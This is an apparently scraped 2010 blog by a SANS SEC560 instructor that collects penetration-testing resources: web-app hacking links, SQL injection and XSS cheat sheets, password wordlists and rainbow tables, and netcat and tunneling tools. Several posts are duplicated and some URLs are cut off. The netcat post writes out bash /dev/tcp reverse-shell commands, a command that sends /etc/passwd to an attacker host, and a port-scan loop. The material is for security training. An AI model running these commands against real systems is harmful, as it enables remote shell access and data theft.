Here's some links I provided to my sec560 students this week for the web application hacking section of the course.
Some of these were part of a list I put together last year which ended up getting posted to the OWASP blog at http://owasp.blogspot.com/2009/12/sql-injection-resources.html, but I've added a few new items as well.
By the way, if you are in the northern New Jersey area & would like to participate in a monthly infosec meeting, my sec560 students & I are going to put together an informal group which will meet monthly in the Parsippany NJ area (most likely at a bar & grill or coffee house) to discuss current industry events, share knowledge & have a few laughs, all are welcome!
Cheers,
RP
Web application hacking resources
Vulnerable WebApps:
OWASPBWA - https://code.google.com/p/owaspbwa/wiki/ProjectSummary
GOAT - http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
MOTH - http://www.bonsai-sec.com/en/research/moth.php
Damn Vulnerable Web App - http://www.dvwa.co.uk/
Gruyere - http://google-gruyere.appspot.com/
Mutillidae - http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Hackme Bank - http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
Hackme Travel - http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
Hackme Shipping -
http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
Hackme Casino - http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
Videos & webcasts:
Offensive Python for Web Hackers - http://www.securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx
OWASP Appsec NYC 2008 -http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference
Caught in the web series - http://www.coresecurity.com/content/ondemand-caught
Invasion of the browser snatchers series -http://www.coresecurity.com/content/on-demand-snatchers
Advanced SQL injection -http://www.irongeek.com/i.php?page=videos/joe-mccray-advanced-sql-injection
Websec 101 - http://www.foundstone.com/us/websec101.asp
Hackme Bank & Hackme Travel videos- http://www.foundstone.com/us/resources-videos.asp
Tools
Samurai Web Testing Framework (Live CD which contains most tools needed to perform web assesment) - http://samurai.inguardians.com
Google Hacking Database - http://www.hackersforcharity.org/ghdb/
Burpsuite - http://portswigger.net/suite/
W3AF - http://w3af.sourceforge.net/
Samurai plugins for Firefox (lots of great plugins here) - https://addons.mozilla.org/en-US/firefox/collection/samurai
Dirbuster plugin for Firefox - http://www.sittinglittleduck.com/DirBuster-1.0-RC1.xpi
Wikto - http://www.sensepost.com/labs/tools/pentest/wikto
Sqlmap - http://sqlmap.sourceforge.net/
Methodologies & references
OWASP Testing Guide - http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
OWASP wiki, has lists of attacks with detailed descriptions & syntax - http://www.owasp.org/index.php/Category:Attack
Cheat Sheets
SQL Injection Cheat Sheet -http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection Cheat Sheet - http://michaeldaw.org/sql-injection-cheat-sheet
SQL Injection Cheat Sheet w/ filter evasion - http://ha.ckers.org/sqlinjection/
SQL Injection Cheat Sheets sorted by DB -http://pentestmonkey.net/index.php?option=com_content&task=category§ionid=9&id=24&Itemid=1
XSS Cheat Sheet w/ filter evasion - http://ha.ckers.org/xss.html
Web App Assesment Cheat Sheet -http://www.secguru.com/files/cheatsheet/webappcheatsheet2.pdf
Books:
Web Application Hackers Handbook - http://portswigger.net/wahh/
SQL Injection Attacks & Defense - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240
XSS Attacks: Cross Site Scripting Exploits and Defense - https://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543
The Oracle Hackers Handbook - http://www.amazon.com/dp/0470080221/ref=nosim?tag=siriusbtechnolog5-20
Whitepapers & slides-
Constricting the Web - Offensive Python for Web Hackers - http://media.blackhat.com/bh-us-10/whitepapers/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-wp.pdf
OWASP article on Web application penetration testing -http://www.owasp.org/index.php/Web_Application_Penetration_Testing
Advanced SQL injection -http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf
Best of web application penetration testing tools -http://pauldotcom.com/TriplePlay-WebAppPenTestingTools.pdf
(The next two papers are a little old, but still quite useful)
Advanced SQL Injection in SQL Server -http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
(More) Advanced SQL Injection in SQL server -http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
Thursday, August 26, 2010
Saturday, August 21, 2010
Password cracking resources
Here's a few links to word lists, rainbow tables & other assorted password cracking related resources I provided to my sec560 mentor class. It seems to me to be a fairly short list so I believe I may be omitting a few things. If you notice something missing, let me know & I'll add it in...
Cheers,
RP
http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf - BackTrack 4 CUDA guide, crack passwords at lightning speeds using GPU's.
http://www.skullsecurity.org/wiki/index.php/Passwords - Ron Bowes' site (author of SMB* nse scripts) with many different password lists including large lists of leaked passwords from Facebook, MySpace, Rockyou, etc. compromised accounts. Also has analysis of these lists showing most commonly used passwords.
http://download.openwall.net/pub/passwords/ - Collection of password recovery tools.
http://download.openwall.net/pub/wordlists/ - Openwall wordlists (free version), you can buy the full sets here - http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html - Good set of various lists, including male & female names.
http://packetstormsecurity.org/Crackers/wordlists/ - Wordlists comprised of words from different areas of interest (sport, movies, computing, literature, etc.)
http://rainbowtables.shmoo.com/ - Very good set of LANMAN rainbow tables from the Shmoo Group. (about 36GB)
http://www.freerainbowtables.com/en/tables/ntlm/ - Sets of LANMAN, NT & MD5 tables (you can buy them also & have them shipped to you on 1TB or 1.5TB drive)
http://ophcrack.sourceforge.net/tables.php - Much smaller set of LANMAN & NT tables, but pretty effective against most passwords (especially the LANMAN tables). Have to pay for most NT tables though.
Cheers,
RP
http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf - BackTrack 4 CUDA guide, crack passwords at lightning speeds using GPU's.
http://www.skullsecurity.org/wiki/index.php/Passwords - Ron Bowes' site (author of SMB* nse scripts) with many different password lists including large lists of leaked passwords from Facebook, MySpace, Rockyou, etc. compromised accounts. Also has analysis of these lists showing most commonly used passwords.
http://download.openwall.net/pub/passwords/ - Collection of password recovery tools.
http://download.openwall.net/pub/wordlists/ - Openwall wordlists (free version), you can buy the full sets here - http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html - Good set of various lists, including male & female names.
http://packetstormsecurity.org/Crackers/wordlists/ - Wordlists comprised of words from different areas of interest (sport, movies, computing, literature, etc.)
http://rainbowtables.shmoo.com/ - Very good set of LANMAN rainbow tables from the Shmoo Group. (about 36GB)
http://www.freerainbowtables.com/en/tables/ntlm/ - Sets of LANMAN, NT & MD5 tables (you can buy them also & have them shipped to you on 1TB or 1.5TB drive)
http://ophcrack.sourceforge.net/tables.php - Much smaller set of LANMAN & NT tables, but pretty effective against most passwords (especially the LANMAN tables). Have to pay for most NT tables though.
Friday, August 13, 2010
/dev/tcp contest
So, I gave my SEC560 mentor class a challenge this week, the student who finds the coolest use for /dev/tcp get's a $10 gift certificate to Starbucks (hey, I'm poor, ok?)
Anyway, I want to extend this out to my millions of readers (hi mom), the most creative use of /dev/tcp wins a $10 Starbucks gift certificate, a handful of EFF stickers & anything else interesting I can find in my desk.
Good luck & remember "If you're not playing the game, the game is playing you"
Anyway, I want to extend this out to my millions of readers (hi mom), the most creative use of /dev/tcp wins a $10 Starbucks gift certificate, a handful of EFF stickers & anything else interesting I can find in my desk.
Good luck & remember "If you're not playing the game, the game is playing you"
Resources on netcat, /dev/tcp, tunneling, etc.
Here's a few more resources I provided to my SANS SEC560 mentor class. The main topic of this week's session was netcat (with a bit of /dev/tcp thrown in for good measure) & as usual the conversation strayed into other ways to redirect & tunnel traffic so you'll find some resources in that regard below.
I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.
Enjoy!
Ed Skoudis- Crazy Ass Necat Relays for Fun & Profit: http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy-Ass_Netcat_Relays_for_Fun_and_Profit
Ed Skoudis -Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/coresecurity/PenTestingNinjitsuSeries.html
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/coresecurity/PenTestingPerfectStormSeries.html
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/coresecurity/PerfectStormPart4.html
Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/coresecurity/InvasionoftheBrowserSnatchersSeries.html
The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf
HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.html
Netcat variants:
Ncat: http://nmap.org/ncat/
Socat: http://www.dest-unreach.org/socat/
Cryptcat: http://cryptcat.sourceforge.net/info.php
DNScat: http://tadek.pietraszek.org/projects/DNScat/
Also, here are some awesome tunneling & proxying tools
PTunnel - http://www.cs.uit.no/~daniels/PingTunnel/
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies
Stunnel - http://www.stunnel.org/ -
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL
Proxytunnel - http://proxytunnel.sourceforge.net/
Create tunnels using HTTP and HTTPS proxies (That understand the HTTP CONNECT command). Work as a back-end driver for an OpenSSH client, and create SSH connections through HTTP(S) proxies.
The included paper is a REALLY good read as well - http://proxytunnel.sourceforge.net/paper.php
ProxyChains - http://proxychains.sourceforge.net/
This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.
BASH connect back shell using /dev/tcp from http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
GnuCitizen User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0 # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0&0 2>&0
Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:
Linux
• /dev/tcp rocks! • On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port] which a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in: • $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor
/bin/bash –i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered
Linux Command-Line Port Scanner
• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]
Storing Results and Iterating
• But, it does set the error condition variable “$?” to 0 if the port is open, 1 if it is closed • For a port scanner, we could use a while loop that increments through port numbers
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.
Enjoy!
Ed Skoudis- Crazy Ass Necat Relays for Fun & Profit: http://pauldotcom.com/wiki/
Ed Skoudis -Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/
Ed Skoudis /Josh Wright/ Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/
Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/
The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.
HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.
Netcat variants:
Ncat: http://nmap.org/ncat/
Socat: http://www.dest-unreach.org/
Cryptcat: http://cryptcat.sourceforge.
DNScat: http://tadek.pietraszek.org/
Also, here are some awesome tunneling & proxying tools
PTunnel - http://www.cs.uit.no/~daniels/
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies
Stunnel - http://www.stunnel.org/ -
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL
Proxytunnel - http://proxytunnel.
Create tunnels using HTTP and HTTPS proxies (That understand the HTTP CONNECT command). Work as a back-end driver for an OpenSSH client, and create SSH connections through HTTP(S) proxies.
The included paper is a REALLY good read as well - http://proxytunnel.
ProxyChains - http://proxychains.
This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.
BASH connect back shell using /dev/tcp from http://www.
GnuCitizen User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis User Link
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0 # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0&0 2>&0
Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:
Linux
• /dev/tcp rocks! • On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port] which a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in: • $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor
/bin/bash –i > /dev/tcp/[Attacker_IPaddr]/[
• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered
Linux Command-Line Port Scanner
• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]
Storing Results and Iterating
• But, it does set the error condition variable “$?” to 0 if the port is open, 1 if it is closed • For a port scanner, we could use a while loop that increments through port numbers
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
Subscribe to:
Posts (Atom)